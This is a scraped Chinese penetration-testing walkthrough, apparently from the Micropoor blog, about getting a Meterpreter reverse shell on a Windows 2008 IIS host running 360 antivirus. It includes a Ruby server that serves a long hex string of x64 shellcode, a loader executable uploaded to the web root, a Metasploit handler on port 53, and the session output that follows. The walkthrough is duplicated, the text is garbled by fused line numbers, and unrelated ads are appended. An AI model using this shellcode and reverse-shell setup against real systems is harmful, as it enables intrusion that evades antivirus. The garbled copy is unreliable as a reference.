靶机mscorsvw
mscorsvw 时间:2021-05-23 阅读:()
专注APT攻击与防御https://micropoor.
blogspot.
com/攻击机:192.
168.
1.
4Debian靶机:192.
168.
1.
2Windows2008目标机安装:360卫士+360杀毒12[*]磁盘列表[C:D:E:]34C:\inetpub\wwwroot\>tasklist56映像名称PID会话名会话#内存使用78SystemIdleProcess0024K9System40372K10smss.
exe2360956K11csrss.
exe32405,572K12csrss.
exe364114,452K13wininit.
exe37204,508K14winlogon.
exe40815,364K15services.
exe46807,376K16lsass.
exe47609,896K17lsm.
exe48403,876K18svchost.
exe57608,684K19vmacthlp.
exe63203,784K20svchost.
exe67607,384K21svchost.
exe764012,716K22svchost.
exe800029,792K23svchost.
exe848011,248K24svchost.
exe90009,308K25svchost.
exe940016,184K26svchost.
exe332011,800K27spoolsv.
exe548015,568K28svchost.
exe105208,228K29svchost.
exe107608,808K30svchost.
exe114402,576K31VGAuthService.
exe1216010,360K32vmtoolsd.
exe1300018,068K33ManagementAgentHost.
exe133208,844K34svchost.
exe1368011,884K35WmiPrvSE.
exe1768013,016K36dllhost.
exe1848011,224K37msdtc.
exe194007,736K38WmiPrvSE.
exe1440019,768K39mscorsvw.
exe29604,732K40mscorsvw.
exe58405,088K41sppsvc.
exe147608,408K42taskhost.
exe261216,344K43dwm.
exe286814,604K44explorer.
exe2896144,912K45vmtoolsd.
exe3008117,744K46TrustedInstaller.
exe2268015,776K47360Tray.
exe268416,056K48360sd.
exe263611,316K49ZhuDongFangYu.
exe2456014,292K50360rp.
exe1712127,072K51SoftMgrLite.
exe864116,816K52w3wp.
exe3300042,836K53svchost.
exe384004,584K54notepad.
exe371215,772K55cmd.
exe338402,376K56conhost.
exe352003,420K57tasklist.
exe309605,276K581C:\>dir2驱动器C中的卷没有标签.
3卷的序列号是C6F8‐9BAB45C:\的目录672017/12/1303:28inetpub82009/07/1411:20PerfLogs92017/12/1303:28ProgramFiles102019/01/2314:09ProgramFiles(x86)112019/01/2314:15Users122017/12/1303:25Windows130个文件0字节146个目录21,387,132,928可用字节15目标机位x64位Windows20081C:\>ver23MicrosoftWindows[版本6.
1.
7600]配置payload:1root@John:/var/www/html#cat.
/Micropoor_rev.
rb2require'socket'3ifARGV.
empty4puts"Usage:"5puts"Micropoor.
rbport"6exit7end89PORT=ARGV.
first.
to_i1011defhandle_connection(client)12puts"Payloadison‐line#{client}"1314client.
write("4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f748315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a5522ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a60baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec783e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b9266385ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dccee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa84676ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeece09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a28908e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")15client.
close16end1718socket=TCPServer.
new('0.
0.
0.
0',PORT)19puts"Listeningon#{PORT}.
"2021whileclient=socket.
accept22Thread.
new{handle_connection(client)}23end2425root@John:/var/www/html#ruby.
/Micropoor_rev.
rb808026Listeningon8080.
27上传Micropoor_shellcode_x64.
exe配置msf:1msfexploit(multi/handler)>useexploit/multi/handler2msfexploit(multi/handler)>setpayloadwindows/x64/meterpreter/reverse_tcp3payload=>windows/x64/meterpreter/reverse_tcp4msfexploit(multi/handler)>showoptions56Moduleoptions(exploit/multi/handler):78NameCurrentSettingRequiredDescription9101112Payloadoptions(windows/x64/meterpreter/reverse_tcp):1314NameCurrentSettingRequiredDescription1516EXITFUNCprocessyesExittechnique(Accepted:'',seh,thread,process,none)17LHOST192.
168.
1.
4yesThelistenaddress(aninterfacemaybespecified)18LPORT53yesThelistenport192021Exploittarget:2223IdName24‐‐‐‐‐‐250WildcardTarget262728msfexploit(multi/handler)>exploit2930[*]StartedreverseTCPhandleron192.
168.
1.
4:5331靶机执行:1msfexploit(multi/handler)>exploit23[*]StartedreverseTCPhandleron192.
168.
1.
4:534[*]Sendingstage(206403bytes)to192.
168.
1.
25[*]Meterpretersession6opened(192.
168.
1.
4:53‐>192.
168.
1.
2:49744)at2019‐01‐2301:29:00‐050067meterpreter>getuid8Serverusername:IISAPPPOOL\DefaultAppPool9meterpreter>sysinfo10Computer:WIN‐5BMI9HGC42S11OS:Windows2008R2(Build7600).
12Architecture:x6413SystemLanguage:zh_CN14Domain:WORKGROUP15LoggedOnUsers:116Meterpreter:x64/windows17meterpreter>ipconfig1819Interface12021Name:SoftwareLoopbackInterface122HardwareMAC:00:00:00:00:00:0023MTU:429496729524IPv4Address:127.
0.
0.
125IPv4Netmask:255.
0.
0.
026IPv6Address:::127IPv6Netmask:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff282930Interface113132Name:Intel(R)PRO/1000MTNetworkConnection33HardwareMAC:00:0c:29:bc:0d:5c34MTU:150035IPv4Address:192.
168.
1.
236IPv4Netmask:255.
255.
255.
037IPv6Address:fe80::5582:70c8:a5a8:822338IPv6Netmask:ffff:ffff:ffff:ffff::391meterpreter>ps23ProcessList456PIDPPIDNameArchSessionUserPath7800[SystemProcess]940System102364smss.
exe11296468mscorsvw.
exe12324316csrss.
exe13332468svchost.
exe14364356csrss.
exe15372316wininit.
exe16408356winlogon.
exe17468372services.
exe18476372lsass.
exe19484372lsm.
exe20548468spoolsv.
exe21576468svchost.
exe22584468mscorsvw.
exe23632468vmacthlp.
exe24676468svchost.
exe25764468svchost.
exe26800468svchost.
exe27848468svchost.
exe288642684SoftMgrLite.
exe29900468svchost.
exe30940468svchost.
exe311052468svchost.
exe321076468svchost.
exe331144468svchost.
exe341216468VGAuthService.
exe351300468vmtoolsd.
exe361332468ManagementAgentHost.
exe371368468svchost.
exe381440576WmiPrvSE.
exe391476468sppsvc.
exe4017122636360rp.
exe411768576WmiPrvSE.
exe421848468dllhost.
exe431940468msdtc.
exe442456468ZhuDongFangYu.
exe452612468taskhost.
exe4626361096360sd.
exe4726841096360Tray.
exe4827883408Micropoor_shellcode_x64.
exex640IISAPPPOOL\DefaultAppPoolC:\inetpub\wwwroot\Micropoor_shellcode_x64.
exe492868900dwm.
exe5028962852explorer.
exe5130082896vmtoolsd.
exe523196468svchost.
exe5333001368w3wp.
exex640IISAPPPOOL\DefaultAppPoolc:\windows\system32\inetsrv\w3wp.
exe5434083300cmd.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\cmd.
exe5537122896notepad.
exe564092324conhost.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\conhost.
exe5758meterpreter>59靶机:附录:Micropoor_shellcodeforpayloadbackdoorhttps://micropoor.
blogspot.
com/2019/01/micropoorshellcode-for-payload-backdoor.
htmlMicropoor
blogspot.
com/攻击机:192.
168.
1.
4Debian靶机:192.
168.
1.
2Windows2008目标机安装:360卫士+360杀毒12[*]磁盘列表[C:D:E:]34C:\inetpub\wwwroot\>tasklist56映像名称PID会话名会话#内存使用78SystemIdleProcess0024K9System40372K10smss.
exe2360956K11csrss.
exe32405,572K12csrss.
exe364114,452K13wininit.
exe37204,508K14winlogon.
exe40815,364K15services.
exe46807,376K16lsass.
exe47609,896K17lsm.
exe48403,876K18svchost.
exe57608,684K19vmacthlp.
exe63203,784K20svchost.
exe67607,384K21svchost.
exe764012,716K22svchost.
exe800029,792K23svchost.
exe848011,248K24svchost.
exe90009,308K25svchost.
exe940016,184K26svchost.
exe332011,800K27spoolsv.
exe548015,568K28svchost.
exe105208,228K29svchost.
exe107608,808K30svchost.
exe114402,576K31VGAuthService.
exe1216010,360K32vmtoolsd.
exe1300018,068K33ManagementAgentHost.
exe133208,844K34svchost.
exe1368011,884K35WmiPrvSE.
exe1768013,016K36dllhost.
exe1848011,224K37msdtc.
exe194007,736K38WmiPrvSE.
exe1440019,768K39mscorsvw.
exe29604,732K40mscorsvw.
exe58405,088K41sppsvc.
exe147608,408K42taskhost.
exe261216,344K43dwm.
exe286814,604K44explorer.
exe2896144,912K45vmtoolsd.
exe3008117,744K46TrustedInstaller.
exe2268015,776K47360Tray.
exe268416,056K48360sd.
exe263611,316K49ZhuDongFangYu.
exe2456014,292K50360rp.
exe1712127,072K51SoftMgrLite.
exe864116,816K52w3wp.
exe3300042,836K53svchost.
exe384004,584K54notepad.
exe371215,772K55cmd.
exe338402,376K56conhost.
exe352003,420K57tasklist.
exe309605,276K581C:\>dir2驱动器C中的卷没有标签.
3卷的序列号是C6F8‐9BAB45C:\的目录672017/12/1303:28inetpub82009/07/1411:20PerfLogs92017/12/1303:28ProgramFiles102019/01/2314:09ProgramFiles(x86)112019/01/2314:15Users122017/12/1303:25Windows130个文件0字节146个目录21,387,132,928可用字节15目标机位x64位Windows20081C:\>ver23MicrosoftWindows[版本6.
1.
7600]配置payload:1root@John:/var/www/html#cat.
/Micropoor_rev.
rb2require'socket'3ifARGV.
empty4puts"Usage:"5puts"Micropoor.
rbport"6exit7end89PORT=ARGV.
first.
to_i1011defhandle_connection(client)12puts"Payloadison‐line#{client}"1314client.
write("4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f748315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a5522ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a60baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec783e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b9266385ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dccee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa84676ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeece09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a28908e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")15client.
close16end1718socket=TCPServer.
new('0.
0.
0.
0',PORT)19puts"Listeningon#{PORT}.
"2021whileclient=socket.
accept22Thread.
new{handle_connection(client)}23end2425root@John:/var/www/html#ruby.
/Micropoor_rev.
rb808026Listeningon8080.
27上传Micropoor_shellcode_x64.
exe配置msf:1msfexploit(multi/handler)>useexploit/multi/handler2msfexploit(multi/handler)>setpayloadwindows/x64/meterpreter/reverse_tcp3payload=>windows/x64/meterpreter/reverse_tcp4msfexploit(multi/handler)>showoptions56Moduleoptions(exploit/multi/handler):78NameCurrentSettingRequiredDescription9101112Payloadoptions(windows/x64/meterpreter/reverse_tcp):1314NameCurrentSettingRequiredDescription1516EXITFUNCprocessyesExittechnique(Accepted:'',seh,thread,process,none)17LHOST192.
168.
1.
4yesThelistenaddress(aninterfacemaybespecified)18LPORT53yesThelistenport192021Exploittarget:2223IdName24‐‐‐‐‐‐250WildcardTarget262728msfexploit(multi/handler)>exploit2930[*]StartedreverseTCPhandleron192.
168.
1.
4:5331靶机执行:1msfexploit(multi/handler)>exploit23[*]StartedreverseTCPhandleron192.
168.
1.
4:534[*]Sendingstage(206403bytes)to192.
168.
1.
25[*]Meterpretersession6opened(192.
168.
1.
4:53‐>192.
168.
1.
2:49744)at2019‐01‐2301:29:00‐050067meterpreter>getuid8Serverusername:IISAPPPOOL\DefaultAppPool9meterpreter>sysinfo10Computer:WIN‐5BMI9HGC42S11OS:Windows2008R2(Build7600).
12Architecture:x6413SystemLanguage:zh_CN14Domain:WORKGROUP15LoggedOnUsers:116Meterpreter:x64/windows17meterpreter>ipconfig1819Interface12021Name:SoftwareLoopbackInterface122HardwareMAC:00:00:00:00:00:0023MTU:429496729524IPv4Address:127.
0.
0.
125IPv4Netmask:255.
0.
0.
026IPv6Address:::127IPv6Netmask:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff282930Interface113132Name:Intel(R)PRO/1000MTNetworkConnection33HardwareMAC:00:0c:29:bc:0d:5c34MTU:150035IPv4Address:192.
168.
1.
236IPv4Netmask:255.
255.
255.
037IPv6Address:fe80::5582:70c8:a5a8:822338IPv6Netmask:ffff:ffff:ffff:ffff::391meterpreter>ps23ProcessList456PIDPPIDNameArchSessionUserPath7800[SystemProcess]940System102364smss.
exe11296468mscorsvw.
exe12324316csrss.
exe13332468svchost.
exe14364356csrss.
exe15372316wininit.
exe16408356winlogon.
exe17468372services.
exe18476372lsass.
exe19484372lsm.
exe20548468spoolsv.
exe21576468svchost.
exe22584468mscorsvw.
exe23632468vmacthlp.
exe24676468svchost.
exe25764468svchost.
exe26800468svchost.
exe27848468svchost.
exe288642684SoftMgrLite.
exe29900468svchost.
exe30940468svchost.
exe311052468svchost.
exe321076468svchost.
exe331144468svchost.
exe341216468VGAuthService.
exe351300468vmtoolsd.
exe361332468ManagementAgentHost.
exe371368468svchost.
exe381440576WmiPrvSE.
exe391476468sppsvc.
exe4017122636360rp.
exe411768576WmiPrvSE.
exe421848468dllhost.
exe431940468msdtc.
exe442456468ZhuDongFangYu.
exe452612468taskhost.
exe4626361096360sd.
exe4726841096360Tray.
exe4827883408Micropoor_shellcode_x64.
exex640IISAPPPOOL\DefaultAppPoolC:\inetpub\wwwroot\Micropoor_shellcode_x64.
exe492868900dwm.
exe5028962852explorer.
exe5130082896vmtoolsd.
exe523196468svchost.
exe5333001368w3wp.
exex640IISAPPPOOL\DefaultAppPoolc:\windows\system32\inetsrv\w3wp.
exe5434083300cmd.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\cmd.
exe5537122896notepad.
exe564092324conhost.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\conhost.
exe5758meterpreter>59靶机:附录:Micropoor_shellcodeforpayloadbackdoorhttps://micropoor.
blogspot.
com/2019/01/micropoorshellcode-for-payload-backdoor.
htmlMicropoor
- 靶机mscorsvw相关文档
- optedmscorsvw
- Hiddenmscorsvw
- 进程mscorsvw进程占用CPU高怎么办
- 进程mscorsvw进程CPU占用高的问题
- 进程解决mscorsvw进程CPU占用高的方法
- 进程解决mscorsvw进程CPU占用高的方法
Spinservers:美国独立服务器(圣何塞),$111/月
spinservers是Majestic Hosting Solutions,LLC旗下站点,主营美国独立服务器租用和Hybrid Dedicated等,spinservers这次提供的大硬盘、大内存服务器很多人很喜欢。TheServerStore自1994年以来,它是一家成熟的企业 IT 设备供应商,专门从事二手服务器和工作站业务,在德克萨斯州拥有40,000 平方英尺的仓库,库存中始终有数千台...
PIGYUN:美国联通CUVIPCUVIP限时cuvip、AS9929、GIA/韩国CN2机房限时六折
pigyun怎么样?PIGYunData成立于2019年,2021是PIGYun为用户提供稳定服务的第三年,目前商家提供香港CN2线路、韩国cn2线路、美西CUVIP-9929、GIA等线路优质VPS,基于KVM虚拟架构,商家采用魔方云平台,所有的配置都可以弹性选择,目前商家推出了七月优惠,韩国和美国所有线路都有相应的促销,六折至八折,性价比不错。点击进入:PIGYun官方网站地址PIGYUN优惠...
火数云-618限时活动,国内云服务器大连3折,限量50台,九江7折 限量30台!
官方网站:点击访问火数云活动官网活动方案:CPU内存硬盘带宽流量架构IP机房价格购买地址4核4G50G 高效云盘20Mbps独享不限openstack1个九江287元/月立即抢购4核8G50G 高效云盘20Mbps独享不限openstack1个九江329元/月立即抢购2核2G50G 高效云盘5Mbps独享不限openstack1个大连15.9元/月立即抢购2核4G50G 高效云盘5Mbps独享不限...
mscorsvw为你推荐
-
Source163http://www.paper.edu.cn支持ipad化学品安全技术说明书eacceleratoraccess violation问题的解决办法!eaccelerator开启eAccelerator内存优化就各种毛病,DZ到底用哪个内存优化比较好。。。photoshop技术photoshop技术对哪些工作有用?ipadwifiipad的wifi打不开怎么办?win7telnetwindows7旗舰版中telnet在哪canvas2动漫cv井口裕香,都有哪些作品?